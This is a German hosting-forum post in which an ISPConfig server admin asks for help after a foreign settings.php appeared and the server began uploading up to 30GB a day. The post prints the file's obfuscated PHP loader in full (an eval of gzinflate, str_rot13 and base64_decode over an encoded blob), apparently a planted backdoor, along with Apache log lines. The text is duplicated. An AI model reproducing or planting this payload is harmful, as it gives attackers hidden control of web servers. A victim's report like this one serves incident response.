Hallo, ich habe einen Debian 4 Server mit ISPConfig 3 in Betrieb. Vor kurzem fing der Server an, grosse Datenmengen hochzuladen. Bis zu 30GB am Tag. Ich fand in einem Verzeichnis /var/www/clients/client1/web3 eine settings.php die nicht von mir erstellt wurde mit dem Inhalt:
<?php eval(gzinflate(str_rot13(base64_decode('DdFUsptXAEDR5fj9b0AUiGVsQI6tQBMEExehgRbQVXF29d9qCeeiLe9/mi8maJ8v6HRepr/TuLD8QpHPVRT+SagcK/TzWC/NqHstiqLoyolbKhs0zgeXnwgIziP+aZ6qstij+Eiccoun8vW0vU5ti78HTXi5zIQ10Ahupml7FbCMWBhF9Mvx/Lahu8KUY9VryYBSNdBGW7EQWsJ3MGMeqEce3hXiEr9mTp7KnyNmmCizj8QldUuNujB48BZAR2jYpfBSUDW3lHgf9KNC8rBjGri5VA9lTr8JKgaqPDb2ab7D9g1sfSTylrnJNLhjc+erfkRBfSa//LlBkQtzmsm7K28Xq7Tf8qIaFe6PtYIHr6Ma7exuf33BKvJi7UHAe8o+gcD3S0Bb1SMM21S8nBAaqGAAoi1ZRMopsipskbSGudhonGR6ZyNiWQ54WjcQXMfwlvpC8nOBa3s47f7CxebJ1zgYJS8x6lrpnY7My7acRYkhEe1s3LC3DMUfwWMFlMxeJsbQxUSqo12Xdjna1WPf0xlOuWDZlKouwuscl+Wcizmsh2oFqBX/OzoSQevjW/vP0Eo87f5nZGSgm9Tp/qjtl9KeC8vyXhQorcZ3+qbQb+8b60keK6wmYjAe7HhwELDV8GeQXe3RY1Xn4WZYQqMkqe3GrjkyphbajpbpScCWpsY7ny+UsqGa3wZDHz37XVP9aTXLJK/UwPSmC1jCjKfwPKsviKcS4I/z8MSny/O7rvX+AUTFuqyJ6PUj7PjUf11CcLJhRvXxiFE67QIY7LLCbWcD5n13jIKnITF65+NokBl6Oz1mhLNGGZ4/eKGQxbDuXCIOBRCyVcLcfX2wpwuDM1RXq8LPrK4Uhk3ixWbJfRI3EapdZYjoPAzuvjG39dlISU7ypuPNKRn5cn/byHOCGd/t9owLbYjeCb3Hk9k4rejO6pNawf5ncyeg+nw6vnZhC/QUU6QwocneG76lqFA0DPouov2I02SnwvRu9EeyXbE8akhUuKozy2V6nxe624/L+IwfTSFGNF0Te//z59d///r9Pw==')))); ?>
Hab das mal durch einen Encrypter gejagt. Ob diese Datei nun dafür Verantwortlich ist oder nicht ist mir erst einmal egal. Schlimmer finde ich, das die Datei dort erstellt wurde, obwohl ist sehr sichere Passworte benutze. Ich kann ja sehen, wann die Datei erstellt wurde, aber im Apache Log finde ich dazu nur:
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "GET /robots.txt HTTP/1.1" 404 1873 "-" "Link Valet Online 1.1"
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "HEAD /settings.php HTTP/1.1" 404 0 "http://htmlhelp.com/tools/valet/linktest.cgi" "Link Valet Online 1.1"
Ich würde nun gerne herausfinden, welche Datei oder Prozess diesen Traffic verursacht. Kann man das herausfinden ?
Und kann man feststellen, wie die Datei in der Verzeichnis erstellt wurde ?
... habe die settings.php im messages log gefunden, sie wurde per ftp hochgeladen. Aber dort habe ich auch ein sicheres PW.
<?php eval(gzinflate(str_rot13(base64_decode('DdFUsptXAEDR5fj9b0AUiGVsQI6tQBMEExehgRbQVXF29d9qCeeiLe9/mi8maJ8v6HRepr/TuLD8QpHPVRT+SagcK/TzWC/NqHstiqLoyolbKhs0zgeXnwgIziP+aZ6qstij+Eiccoun8vW0vU5ti78HTXi5zIQ10Ahupml7FbCMWBhF9Mvx/Lahu8KUY9VryYBSNdBGW7EQWsJ3MGMeqEce3hXiEr9mTp7KnyNmmCizj8QldUuNujB48BZAR2jYpfBSUDW3lHgf9KNC8rBjGri5VA9lTr8JKgaqPDb2ab7D9g1sfSTylrnJNLhjc+erfkRBfSa//LlBkQtzmsm7K28Xq7Tf8qIaFe6PtYIHr6Ma7exuf33BKvJi7UHAe8o+gcD3S0Bb1SMM21S8nBAaqGAAoi1ZRMopsipskbSGudhonGR6ZyNiWQ54WjcQXMfwlvpC8nOBa3s47f7CxebJ1zgYJS8x6lrpnY7My7acRYkhEe1s3LC3DMUfwWMFlMxeJsbQxUSqo12Xdjna1WPf0xlOuWDZlKouwuscl+Wcizmsh2oFqBX/OzoSQevjW/vP0Eo87f5nZGSgm9Tp/qjtl9KeC8vyXhQorcZ3+qbQb+8b60keK6wmYjAe7HhwELDV8GeQXe3RY1Xn4WZYQqMkqe3GrjkyphbajpbpScCWpsY7ny+UsqGa3wZDHz37XVP9aTXLJK/UwPSmC1jCjKfwPKsviKcS4I/z8MSny/O7rvX+AUTFuqyJ6PUj7PjUf11CcLJhRvXxiFE67QIY7LLCbWcD5n13jIKnITF65+NokBl6Oz1mhLNGGZ4/eKGQxbDuXCIOBRCyVcLcfX2wpwuDM1RXq8LPrK4Uhk3ixWbJfRI3EapdZYjoPAzuvjG39dlISU7ypuPNKRn5cn/byHOCGd/t9owLbYjeCb3Hk9k4rejO6pNawf5ncyeg+nw6vnZhC/QUU6QwocneG76lqFA0DPouov2I02SnwvRu9EeyXbE8akhUuKozy2V6nxe624/L+IwfTSFGNF0Te//z59d///r9Pw==')))); ?>
Hab das mal durch einen Encrypter gejagt. Ob diese Datei nun dafür Verantwortlich ist oder nicht ist mir erst einmal egal. Schlimmer finde ich, das die Datei dort erstellt wurde, obwohl ist sehr sichere Passworte benutze. Ich kann ja sehen, wann die Datei erstellt wurde, aber im Apache Log finde ich dazu nur:
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "GET /robots.txt HTTP/1.1" 404 1873 "-" "Link Valet Online 1.1"
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "HEAD /settings.php HTTP/1.1" 404 0 "http://htmlhelp.com/tools/valet/linktest.cgi" "Link Valet Online 1.1"
Ich würde nun gerne herausfinden, welche Datei oder Prozess diesen Traffic verursacht. Kann man das herausfinden ?
Und kann man feststellen, wie die Datei in der Verzeichnis erstellt wurde ?
... habe die settings.php im messages log gefunden, sie wurde per ftp hochgeladen. Aber dort habe ich auch ein sicheres PW.
Zuletzt bearbeitet: